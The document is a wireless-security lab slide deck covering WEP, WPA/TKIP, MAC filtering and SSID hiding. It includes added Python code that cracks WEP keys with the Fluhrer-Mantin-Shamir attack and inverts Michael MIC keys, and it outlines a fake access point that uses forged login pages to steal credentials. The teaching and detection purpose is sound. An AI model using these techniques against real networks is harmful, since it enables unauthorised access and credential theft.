Date posted: 08-Jan-2018

Wireless Security

John Himmelein, Erick Andrew, Christian Adam, Varun Bapna


Outline

● 802.11 Overview

● WEP

● Other security measures

● Attacks

● Lab motivation


802.11 Overview

● IEEE 802.11 denotes the family of wireless LAN standards defined by the IEEE

● The most popular amendments are 802.11a/b/g

● 802.11a uses the 5 GHz band; 802.11b/g use the 2.4 GHz band

● 802.11i is the amendment intended to improve security (its TKIP and AES-CCMP protocols are what the WPA and WPA2 certifications cover)


Security Features

● Service Set Identifier (SSID)

● Names the network so that clients can tell access points apart; it is an identifier, not a secret

● Sent out in every beacon frame

● Beacons are unencrypted management frames, so anyone in range can read the SSID


Associating with an AP

● 802.11 authentication comes first, then association; two authentication methods are defined

● Open System or Shared Key

● With Open System anyone can authenticate and associate with the AP; if WEP is enabled it is applied only to the data frames that follow

● Shared Key is a challenge-response: the AP sends a 128-byte challenge, the client returns it WEP-encrypted, and association follows on success. Both the challenge and its ciphertext cross the air, so a sniffer recovers the RC4 keystream for that IV and can answer the next challenge without knowing the key; Shared Key is therefore weaker than Open System


Wired Equivalent Privacy (WEP)

● WEP uses the stream cipher RC4
  – RC4 generates a pseudorandom stream of bits (a "keystream") which is combined with the plaintext using XOR
  – Decryption is performed the same way: XOR the ciphertext with the same keystream

● WEP uses two key sizes: 40-bit and 104-bit (marketed as "64-bit" and "128-bit" WEP)

● To each is prepended a 24-bit initialization vector (IV), which is transmitted in the clear; the RC4 key for a frame is IV || secret key


WEP

● WEP has several weaknesses

● They come from how WEP uses RC4 rather than from RC4 itself: the 24-bit Initialization Vector (IV) is short, sent in the clear and simply prepended to a static key

● This has led to several different types of attacks

● We will use a tool that combines two of these attacks, and the appendix will describe another


WEP attack #1

● The 24-bit IV space is small

● Only 16,777,216 (2^24) possible IVs

● Listen long enough and IVs repeat: a busy AP exhausts the space within hours, and cards that restart the IV counter at zero reuse the low IVs every time they power up

● Two frames with the same IV are XORed with the same keystream. XORing the two frames cancels the keystream, and one known plaintext (the LLC/SNAP header every IP frame starts with, or a packet the attacker caused to be sent) yields the keystream for that IV and decrypts every other frame that uses it. Enough duplicate IVs give a keystream dictionary that decrypts the whole network, without ever recovering the WEP key itself


WEP attack #2

● Another attack relies on the fact that some IVs are weak (Fluhrer, Mantin and Shamir, 2001)

● Using a formula, one can take a weak IV and the first keystream byte (known, because every IP frame starts with the 0xAA of its LLC/SNAP header) and infer one byte of the WEP key with about 5% probability; wrong guesses are spread evenly, so a majority vote over enough weak IVs gives the byte, and the key is recovered one byte at a time

● Listening to the network long enough and the WEP key can be discovered

● This attack, like the last one, can take a very long time: weak IVs are rare (roughly one in 65,000 for each key byte) and many later drivers skip them


WEP attack #3

● A newer attack was developed by a hacker named KoreK (2004)

● This attack relies on gathering enough unique IVs; it does not depend on weak IVs, so it also works against cards that avoid them

● It is a family of statistical attacks that requires about 200,000 unique IVs to determine a 40-bit WEP key
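The following Python program is an added worked example, not code from the original slides or from Aircrack. It implements WEP as described on the "Wired Equivalent Privacy (WEP)" slide (RC4 keyed with IV || secret, IV sent in the clear; the CRC-32 integrity check value that WEP appends is included too, since checking it is how a cracker confirms a key), then attack #1 (keystream recovery from an IV collision plus known plaintext) and attack #2 (the Fluhrer-Mantin-Shamir weak-IV vote). The key, the frame contents and the IV planes enumerated to build the capture are constructed for the demo and are not from the slides; KoreK's attack #3 is not implemented.

```python
import struct
import zlib
from collections import Counter

def rc4(key, n):
    """RC4: key scheduling over `key` (for WEP that is IV || secret), then n keystream bytes."""
    S, j = list(range(256)), 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def wep_encrypt(secret, iv, plaintext):
    """WEP body: IV (3 bytes, in the clear) | key-id byte | RC4(IV||secret) XOR (plaintext || ICV)."""
    data = plaintext + struct.pack("<I", zlib.crc32(plaintext))  # ICV = CRC-32, low byte first
    return iv + b"\x00" + bytes(d ^ k for d, k in zip(data, rc4(iv + secret, len(data))))

def wep_decrypt(secret, frame):
    body = frame[4:]
    data = bytes(c ^ k for c, k in zip(body, rc4(frame[:3] + secret, len(body))))
    if struct.unpack("<I", data[-4:])[0] != zlib.crc32(data[:-4]):
        raise ValueError("ICV mismatch: wrong key or modified frame")
    return data[:-4]

# Attack #1: frames that share an IV share a keystream. One known plaintext (a SNAP header,
# a packet we caused to be sent, or a Shared Key challenge) gives the keystream for that IV.
def keystream_from_known(frame, known_plaintext):
    return bytes(c ^ p for c, p in zip(frame[4:], known_plaintext))

def decrypt_with_keystream(frame, keystream):
    return bytes(c ^ k for c, k in zip(frame[4:], keystream))

# Attack #2 (Fluhrer-Mantin-Shamir): for a "resolved" IV the first keystream byte z points at the
# next unknown key byte with probability ~5%; other IVs vote roughly uniformly, so a majority wins.
SNAP0 = 0xAA  # first plaintext byte of every IP/ARP frame (LLC/SNAP header), so z = ciphertext[0] ^ 0xAA

def fms_vote(iv, prefix, z):
    """Vote for key byte number len(iv)+len(prefix), or None if this IV is not resolved for it."""
    K = iv + prefix
    n = len(K)
    S, j = list(range(256)), 0
    for i in range(n):  # run the key schedule only as far as the known key bytes allow
        j = (j + S[i] + K[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
    if S[1] >= n or (S[1] + S[S[1]]) & 0xFF != n:
        return None
    return (S.index(z) - j - S[n]) & 0xFF

def fms_recover(samples, key_len):
    """samples: (iv, first keystream byte) pairs from the capture; recovers the secret byte by byte."""
    secret = b""
    for _ in range(key_len):
        votes = Counter()
        for iv, z in samples:
            cand = fms_vote(iv, secret, z)
            if cand is not None:
                votes[cand] += 1
        secret += bytes([votes.most_common(1)[0][0]])
    return secret

# --- constructed demo capture (uses the true key only to decide which IVs are worth encrypting) ---
SECRET = bytes.fromhex("1f2b3c4d5e")  # constructed 40-bit key
PLAINTEXT = bytes([SNAP0, 0xAA, 0x03, 0, 0, 0, 0x08, 0x00]) + b"constructed IP payload"

def resolved_indices(iv, secret):
    """Key-byte positions this IV is resolved for under the true key (same test as fms_vote)."""
    K, S, j, hits = iv + secret, list(range(256)), 0, []
    for i in range(len(K) - 1):
        j = (j + S[i] + K[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        n = i + 1
        if n >= 3 and S[1] < n and (S[1] + S[S[1]]) & 0xFF == n:
            hits.append(n)
    return hits

def weak_iv_capture(secret=SECRET):
    """Resolved IVs are about 1 in 65,000 per key byte, so a real capture needs millions of frames.
    To stay fast we enumerate three IV planes where they cluster for a 40-bit key (second byte 255,
    or first two bytes summing to 1 or 2) and keep only frames whose IV is resolved for some byte."""
    frames = []
    for a in range(256):
        for b in {255, (1 - a) & 0xFF, (2 - a) & 0xFF}:
            for x in range(256):
                iv = bytes([a, b, x])
                if resolved_indices(iv, secret):
                    frames.append(wep_encrypt(secret, iv, PLAINTEXT))
    return frames

def crack_demo(secret=SECRET):
    samples = [(f[:3], f[4] ^ SNAP0) for f in weak_iv_capture(secret)]  # attacker sees IV, guesses SNAP byte
    return fms_recover(samples, len(secret))
```

`crack_demo()` recovers the 40-bit key from roughly 2,500 weak-IV frames in a couple of seconds. `fms_vote` is the "formula" the slide refers to: the key schedule is run over the IV and the key bytes already known, and if the state is resolved (S[1] < n and S[1] + S[S[1]] = n) the first keystream byte points at key byte n. The attacker-side code never sees the key; `resolved_indices` exists only so the demo can skip the millions of frames that a real capture would contain but the attack would ignore.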


Default Settings

● Most consumer access points are very easy to set up

● However, their default states have no encryption, and the default SSIDs, addresses and administrator passwords are published and easy to look up

● Despite this, many people leave their APs in this state, making them easy targets


Protecting Your Network

● There are several methods to increase the security of a wireless network

● Turning off SSID broadcasting

● SSID broadcasting helps attackers find your WLAN

● Not broadcasting is not a security control: the SSID still crosses the air in the clear in probe requests, probe responses and association requests, so passive tools recover it as soon as a client connects. At best it keeps the network out of casual scans


MAC Address Filtering

● MAC address filtering allows only a configured list of hardware addresses to connect

● In theory every device has a unique MAC address

● However, MAC addresses are never encrypted (they sit in the 802.11 header, outside the WEP payload), so a sniffer finds the address of a valid client in seconds

● Most wireless cards allow their MAC address to be changed


WPA - Wi-Fi Protected Access

● WPA (TKIP) keeps RC4 so that it runs on existing hardware, but increases the key size (a 128-bit temporal key), derives a fresh per-packet key from that key, a 48-bit sequence counter and the transmitter address, uses the counter for replay protection, and adds a message integrity check (MIC); together these make breaking into a Wireless LAN far more difficult.

● The Michael algorithm was the strongest MIC the WPA designers could come up with that would still run on most older network cards (a few shifts, XORs and additions per 32-bit word). It offers only about 20 bits of security and is invertible, so it is subject to forgery attacks. To limit this risk, a TKIP network that sees two MIC failures within 60 seconds shuts TKIP traffic down for 60 seconds.
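Michael as specified in 802.11i, written here as an added example (not code from the slides): the block function, the MIC itself, the inverse walk that turns a known (message, MIC) pair back into the MIC key, which is the weakness the countermeasures exist for, and a small model of the 60-second countermeasure rule driven by caller-supplied timestamps. TKIP's actual MIC input (DA, SA, priority, three zero bytes, then the MSDU) and the per-packet key mixing are outside the example, and the countermeasure class is a simplification of the state machine in the standard.

```python
import struct

MASK = 0xFFFFFFFF

def rol(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK

def ror(x, n):
    return ((x >> n) | (x << (32 - n))) & MASK

def xswap(x):
    # swap the two bytes of each 16-bit half: 0xAABBCCDD -> 0xBBAADDCC
    return ((x & 0xFF00FF00) >> 8) | ((x & 0x00FF00FF) << 8)

def b(l, r):
    """Michael block function: rotates, XORs and additions only, cheap enough for the cards of the time."""
    r ^= rol(l, 17); l = (l + r) & MASK
    r ^= xswap(l);   l = (l + r) & MASK
    r ^= rol(l, 3);  l = (l + r) & MASK
    r ^= ror(l, 2);  l = (l + r) & MASK
    return l, r

def b_inv(l, r):
    """Each step of b() undoes exactly; this reversibility is what makes a leaked (message, MIC) pair fatal."""
    l = (l - r) & MASK; r ^= ror(l, 2)
    l = (l - r) & MASK; r ^= rol(l, 3)
    l = (l - r) & MASK; r ^= xswap(l)
    l = (l - r) & MASK; r ^= rol(l, 17)
    return l, r

def pad(msg):
    """Append 0x5a and then 4 to 7 zero bytes, so the padded length is a multiple of 4."""
    msg = msg + b"\x5a" + b"\x00" * 4
    return msg + b"\x00" * (-len(msg) % 4)

def words(data):
    return struct.unpack("<%dI" % (len(data) // 4), data)

def michael(key, msg):
    """8-byte MIC of msg under an 8-byte key (two little-endian 32-bit words)."""
    l, r = struct.unpack("<II", key)
    for m in words(pad(msg)):
        l ^= m
        l, r = b(l, r)
    return struct.pack("<II", l, r)

def recover_key(msg, mic):
    """Run the MIC backwards over the same padded words: the starting state is the MIC key."""
    l, r = struct.unpack("<II", mic)
    for m in reversed(words(pad(msg))):
        l, r = b_inv(l, r)
        l ^= m
    return struct.pack("<II", l, r)

class TkipCountermeasures:
    """802.11i Michael countermeasures: a second MIC failure within 60 s disables TKIP for 60 s."""
    WINDOW = 60.0

    def __init__(self):
        self.last_failure = None
        self.blocked_until = 0.0

    def mic_failure(self, now):
        if self.last_failure is not None and now - self.last_failure < self.WINDOW:
            self.blocked_until = now + self.WINDOW
        self.last_failure = now

    def accepting(self, now):
        return now >= self.blocked_until
```

With the all-zero key and the empty message `michael` returns 82 92 5c 1c a1 d1 30 b8, matching the first of the Michael test vectors published with 802.11i. `recover_key` shows why the countermeasures exist: an attacker who learns one plaintext MSDU and its MIC (for example through a chop-chop style guess of the ICV-protected payload) gets the MIC key in eight word-steps, and the 60-second shutdown is there to make guessing attempts expensive rather than to make the MIC strong.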


Lab Goals

● Determine router type and defaults

● Examining unencrypted traffic

● Bypassing MAC address filtering

● Cracking WEP using Aircrack

● Setting up a fake AP to steal login information


Network Layout


Unencrypted Traffic


MAC Address Filtering

● Sniff traffic for a valid MAC address

● Change your MAC address to the valid one (Spoofing)

● Full access if no encryption on the network


Cracking WEP with Aircrack

● Airodump collects packets

● Aircrack is used on the output file from Airodump

● It uses unique IVs to break the WEP key

● With ~330,000 unique IVs Aircrack broke the key in 1 second

● With ~100,000 it took 21 seconds


Fake AP

● The tool suite we will use allows us to set up our wireless card as an access point

● To make this useful we will need to do some work

● By deauthenticating a client from his AP, we can make him connect to our fake one: deauthentication is an unauthenticated management frame (until 802.11w added management frame protection), so anyone can forge it in the AP's name, and the client reconnects to the strongest AP advertising the SSID it knows

● By forging a web page we can potentially steal important login information

● This attack is very hard for the victim to notice until it is far too late
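An added example, not code from the slides or from any of the tools listed: a small 802.11 frame parser run over a constructed capture that ties together the "Security Features" slide (the SSID arrives in plaintext beacons, and a hidden SSID is just an empty one), the two MAC address filtering slides (the allowed client addresses are readable in the unencrypted header of every data frame the AP exchanges, Protected bit or not), and the fake AP slide seen from the defender's side (a second BSSID advertising a known SSID, and a burst of deauthentication frames in the AP's name). Addresses, SSIDs, the frame contents and the deauth threshold are made up for the example.

```python
import struct
from collections import Counter, defaultdict

# 802.11 MAC header for the three-address management and data frames handled here:
#   frame control | duration | addr1 | addr2 | addr3 | sequence control   (24 bytes, little-endian fields)
HDR = struct.Struct("<HH6s6s6sH")
MGMT, DATA = 0, 2
BEACON, DEAUTH = 8, 12

def mac(raw):
    return ":".join("%02x" % x for x in raw)

def parse_frame(raw):
    fc, _dur, a1, a2, a3, _seq = HDR.unpack_from(raw)
    to_ds, from_ds = (fc >> 8) & 1, (fc >> 9) & 1
    # Which slot holds the station, the AP and the BSSID depends on the To-DS / From-DS flags.
    if not to_ds and not from_ds:
        dst, src, bssid = a1, a2, a3        # management frames (and ad-hoc data)
    elif to_ds and not from_ds:
        bssid, src, dst = a1, a2, a3        # station -> AP
    elif from_ds and not to_ds:
        dst, bssid, src = a1, a2, a3        # AP -> station
    else:
        raise ValueError("four-address WDS frames are not handled")
    return {"type": (fc >> 2) & 3, "subtype": (fc >> 4) & 0xF, "protected": (fc >> 14) & 1,
            "src": mac(src), "dst": mac(dst), "bssid": mac(bssid), "body": raw[HDR.size:]}

def beacon_ssid(body):
    """Walk the information elements after the fixed fields; element 0 is the SSID, in plaintext."""
    pos = 12                                # timestamp (8) + beacon interval (2) + capabilities (2)
    while pos + 2 <= len(body):
        tag, length = body[pos], body[pos + 1]
        value = body[pos + 2:pos + 2 + length]
        if tag == 0:
            # "Hidden" networks send an empty or all-NUL SSID; the name still appears in probe responses.
            return value.decode("utf-8", "replace") if value.strip(b"\x00") else None
        pos += 2 + length
    return None

def survey(frames, known_aps, deauth_limit=10):
    """known_aps: {ssid: bssid}. Returns SSID per BSSID, stations seen talking to each BSSID, and alerts."""
    ssids, stations, deauths, alerts = {}, defaultdict(set), Counter(), []
    for raw in frames:
        f = parse_frame(raw)
        if f["type"] == MGMT and f["subtype"] == BEACON:
            name = beacon_ssid(f["body"])
            ssids[f["bssid"]] = name
            if name in known_aps and known_aps[name] != f["bssid"]:
                alerts.append("rogue AP: %r advertised by %s, expected %s" % (name, f["bssid"], known_aps[name]))
        elif f["type"] == DATA:
            # The non-AP address of any data frame the AP exchanged is a MAC its filter already allows,
            # and the header is never encrypted, even when the Protected bit (WEP) is set on the payload.
            stations[f["bssid"]].add(f["dst"] if f["src"] == f["bssid"] else f["src"])
        elif f["type"] == MGMT and f["subtype"] == DEAUTH:
            deauths[f["bssid"]] += 1
    for bssid, n in deauths.items():
        if n >= deauth_limit:               # simplification: a count per capture rather than a rate
            alerts.append("deauth flood: %d deauthentications claiming to come from %s" % (n, bssid))
    return ssids, dict(stations), alerts

# --- constructed sample capture (not real traffic); addresses and names are made up ---
def build_frame(ftype, subtype, a1, a2, a3, body=b"", to_ds=0, from_ds=0, protected=0):
    fc = (ftype << 2) | (subtype << 4) | (to_ds << 8) | (from_ds << 9) | (protected << 14)
    return HDR.pack(fc, 0, a1, a2, a3, 0) + body

def beacon_body(ssid):
    return b"\x00" * 8 + struct.pack("<HH", 100, 0x0411) + bytes([0, len(ssid)]) + ssid

AP, TWIN, HIDDEN = b"\x00\x11\x22\x33\x44\x55", b"\x66\x77\x88\x99\xaa\xbb", b"\xcc\xdd\xee\xff\x00\x01"
CLIENT, BCAST = b"\x02\x03\x04\x05\x06\x07", b"\xff" * 6

SAMPLE = [
    build_frame(MGMT, BEACON, BCAST, AP, AP, beacon_body(b"lab-net")),
    build_frame(MGMT, BEACON, BCAST, HIDDEN, HIDDEN, beacon_body(b"")),
    build_frame(DATA, 0, AP, CLIENT, BCAST, b"\xaa\xaa\x03", to_ds=1, protected=1),   # client -> AP
    build_frame(DATA, 0, CLIENT, AP, AP, b"\xaa\xaa\x03", from_ds=1, protected=1),    # AP -> client
    build_frame(MGMT, BEACON, BCAST, TWIN, TWIN, beacon_body(b"lab-net")),            # evil twin
] + [build_frame(MGMT, DEAUTH, CLIENT, AP, AP, struct.pack("<H", 7))] * 12            # spoofed deauths

def run_survey():
    return survey(SAMPLE, {"lab-net": mac(AP)})
```

`run_survey()` reports the plaintext SSID of the real AP, `None` for the hidden one, the client address that a MAC filter on the AP must already allow (read straight from WEP-protected data frames), and two alerts: a rogue BSSID advertising the known SSID and a deauth burst in the AP's name. On a real capture the same three observations are what Kismet-style tools and wireless IDS sensors key on; the parser here deliberately stops at the header and the SSID element and does not look into the encrypted payload.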


Links to tools

● Ethereal – http://www.ethereal.com

● Kismet – http://www.kismetwireless.net

● Auditor security collection – http://new.remote-exploit.org/index.php/Auditor_main

● Aircrack – http://www.cr0.net:8040/code/network/aircrack


References

● http://en.wikipedia.org/wiki/RC4

● http://en.wikipedia.org/wiki/WEP

● http://en.wikipedia.org/wiki/IEEE_802.11

● http://www.securityfocus.com/infocus/1814

● http://www.cr0.net:8040/code/network/aircrack/


Questions?

